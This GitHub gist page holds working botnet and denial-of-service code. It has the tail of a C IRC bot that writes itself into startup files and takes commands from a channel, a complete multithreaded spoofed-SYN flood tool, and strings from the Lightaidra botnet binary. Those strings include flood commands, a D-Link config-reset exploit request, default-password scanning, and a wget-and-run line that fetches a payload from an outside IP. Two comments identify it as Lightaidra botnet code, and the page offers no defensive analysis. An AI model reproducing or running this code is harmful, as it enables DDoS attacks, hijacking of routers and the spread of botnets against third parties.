setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
return;
}
if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
sleep(1);
}
server=NULL;
close(sock);
goto start;
}
int main(int argc, char **argv) {
int on,i;
char cwd[256],*str;
FILE *file;
#ifdef STARTUP
str="/etc/rc.d/rc.local";
file=fopen(str,"r");
if (file == NULL) {
str="/etc/rc.conf";
file=fopen(str,"r");
}
if (file != NULL) {
char outfile[256], buf[1024];
int i=strlen(argv[0]), d=0;
getcwd(cwd,256);
if (strcmp(cwd,"/")) {
while(argv[0][i] != '/') i--;
sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
while(!feof(file)) {
fgets(buf,1024,file);
if (!strcasecmp(buf,outfile)) d++;
}
if (d == 0) {
FILE *out;
fclose(file);
out=fopen(str,"a");
if (out != NULL) {
fputs(outfile,out);
fclose(out);
}
}
else fclose(file);
}
else fclose(file);
}
#endif
if (fork()) exit(0);
#ifdef FAKENAME
strncpy(argv[0],FAKENAME,strlen(argv[0]));
for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
#endif
srand((time(NULL) ^ getpid()) + getppid());
nick=makestring();
ident=makestring();
user=makestring();
chan=CHAN;
key=KEY;
server=NULL;
sa:
#ifdef IDENT
for (i=0;i<numpids;i++) {
if (pids[i] != 0 && pids[i] != getpid()) {
kill(pids[i],9);
waitpid(pids[i],NULL,WNOHANG);
}
}
pids=NULL;
numpids=0;
identd();
#endif
con();
Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
while(1) {
unsigned long i;
fd_set n;
struct timeval tv;
FD_ZERO(&n);
FD_SET(sock,&n);
tv.tv_sec=60*20;
tv.tv_usec=0;
if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
unsigned int *newpids,on;
for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
pids[on-1]=0;
numpids--;
newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
for (on=0;on<numpids;on++) newpids[on]=pids[on];
free(pids);
pids=newpids;
}
if (FD_ISSET(sock,&n)) {
char buf[4096], *str;
int i;
if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
buf[i]=0;
str=strtok(buf,"\n");
while(str && *str) {
char name[1024], sender[1024];
filter(str);
if (*str == ':') {
for (i=0;i<strlen(str) && str[i] != ' ';i++);
str[i]=0;
strcpy(sender,str+1);
strcpy(str,str+i+1);
}
else strcpy(sender,"*");
for (i=0;i<strlen(str) && str[i] != ' ';i++);
str[i]=0;
strcpy(name,str);
strcpy(str,str+i+1);
for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
if (!strcasecmp(name,"ERROR")) goto sa;
str=strtok((char*)NULL,"\n");
}
}
}
return 0;
}
Raw
gistfile2.txt
/*
Spoofed SYN by eKKiM
Educational purpose only please.
Compile with
gcc syn.c -pthread
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <pthread.h>
#include <errno.h>
#define THREADS 5
typedef struct pthread_param
{
int argc;
char **argv;
};
typedef struct pseudo_header
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
};
/* Thanks for unknown author, this saves me some time */
unsigned short csum(unsigned short *ptr,int nbytes) {
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}
int attack(int argc, char *argv[])
{
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
char packet[4096];
struct iphdr *iph = (struct iphdr *) packet;
struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip));
struct sockaddr_in sin;
struct pseudo_header psh;
char ip[16];
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr (argv[1]);
sprintf(ip, "%d.%d.%d.%d\n", rand() % 223, rand() % 255, rand() % 255, rand() % 255);
memset (packet, 0, 4096);
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
iph->id = htonl (54321);
iph->frag_off = 0;
iph->ttl = 255;
iph->protocol = IPPROTO_TCP;
iph->check = 0;
iph->saddr = inet_addr(ip);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) packet, iph->tot_len >> 1);
tcph->source = htons (1234);
tcph->dest = htons (80);
tcph->seq = 0;
tcph->ack_seq = 0;
tcph->doff = 5;
tcph->fin=0;
tcph->syn=1;
tcph->rst=0;
tcph->psh=0;
tcph->ack=0;
tcph->urg=0;
tcph->window = htons (5840);
tcph->check = 0;/* We fill this in later */
tcph->urg_ptr = 0;
psh.source_address = inet_addr(ip);
psh.dest_address = sin.sin_addr.s_addr;
psh.placeholder = 0;
psh.protocol = IPPROTO_TCP;
psh.tcp_length = htons(20);
memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
//IP_HDRINCL needed for own headers
int one = 1;
const int *val = &one;
int sockop = setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one));
if (sockop < 0)
{
perror ("[x] Error msg: ");
printf ("[x] Cannot set socket options: %i (are we r00t?)\n", errno);
// exit(-1);
}
if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
printf ("[x] Error sending packet\n");
close(s);
return 0;
}
void *thread_attack(void *thread_params)
{
struct pthread_param *params = thread_params;
while (1)
attack(params->argc, params->argv);
}
int main (int argc, char *argv[])
{
int i;
printf("Spoofed SYN Attack\n");
printf(" by eKKiM\n");
printf(" for Orgy\n\n");
srand(time(0));
if (argc != 4)
{
printf("Usage: %s <destip> <destport> <time in seconds>\n", argv[0]);
return -1;
}
pthread_t ssyn_attack[THREADS];
struct pthread_param params;
params.argc = argc;
params.argv = argv;
for (i = 0; i < THREADS; i++)
pthread_create( &ssyn_attack[i], NULL, thread_attack, (void*) &params);
printf("[*] Attacking..\n");
sleep(atoi(argv[3]));
return 0;
}
Raw
gistfile3.txt
/var/run/.lightpid
%d.%d.%d.%d
@gibsonhacks
%s%s
72.233.89.197
%d.%d.%*s.%*s
light.crabdance.com:5050
PRIVMSG %s :[error] one error in your input data, see help!
PRIVMSG %s :[login] you are logged in, (%s).
PRIVMSG %s :[!login] sorry, wrong authenthication password!
GET /n09230945.asp HTTP/1.0
Host: automation.whatismyip.com
TOPIC %s
##r00tz
->%s
PASS
%s %s
NICK %s
USER pwn localhost localhost :Lightaidra ;)
Aidra?!
PART %s :%s
JOIN %s :%s
PING 0313370
penis123
PRIVMSG %s :*
PRIVMSG %s :* *** EOF
:.synflood
:.ngsynflood
:.ackflood
:.ngackflood
operation
QUOTE ZOMBIE
QUIT :pwn!
:.advscan->random
:.advscan->random->b
:.advscan->recursive
%*s%*s%*s%*s%255[^
(NULL)
PRIVMSG %s :%s
PING
PRIVMSG
:.login
:.logout
:.exec
:.version
:.status
:.help
:.spoof
:.advscan
:.stop
:.synflood->
:.ngsynflood->
:.ackflood->
:.ngackflood->
:.setchan
:.join
:.part
:.quit
PRIVMSG %s :[status] currently not working.
PRIVMSG %s :[status] working on %s
PRIVMSG %s :[version] lightaidra 0x2012.
PRIVMSG %s :[logout] you are logged out!, (%s).
PRIVMSG %s :* *** Access Commands:
PRIVMSG %s :* .login <password> - login to bot's party-line
PRIVMSG %s :* .logout - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process
synflood packeting %s:%u (secs: %u)
PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
ngsynflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
ackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
ngackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
PRIVMSG %s :[stop] %s was stopped!
PRIVMSG %s :[chan] %s setted as master channel.
PRIVMSG %s :[spoof] spoofing set as random ip!
PRIVMSG %s :[spoof] spoofing set as ip: %s
advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)
advscan scanning range %s.%s.0.0/16
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..
PRIVMSG %s :[error] unable to get local ip, switching to random scan..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..
PRIVMSG %s :[!exec] error on command: %s
PRIVMSG %s :[exec] result of "%s":
%127s%31s%31s%31s%31s%31s%31s%31s
PRIVMSG %s :[block] already working on %s
POST /cgi-bin/firmwarecfg HTTP/1.1
Host: $IP
User-Agent: veryprivateacsor
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------41184676334
Content-Length: 234
-----------------------------41184676334
Content-Disposition: form-data; name="config.x"
-----------------------------41184676334
Content-Disposition: form-data; name="config.y"
-----------------------------41184676334--
http://184.106.181.149/html/aidra
rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
PRIVMSG %s :[error] unable to open: %s
PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..
PRIVMSG %s :[advscan] scanner completed, founds %d ips..
PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..
PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!
PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!
password>
password
root
/var/run/.lightscan
%s.%s.%d.%d
%16s
PRIVMSG %s :[ngackflood] packeting completed!
PRIVMSG %s :[ackflood] packeting completed!
PRIVMSG %s :[ngsynflood] packeting completed!
PRIVMSG %s :[nsynflood] packeting completed!
@chines
Copy link
Author

chines commented Jan 22, 2013

3rd items is interesting strings from x86_64 executable found in same dir as source code.

@CanadianJeff
Copy link

nice lightaidra botnet code :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment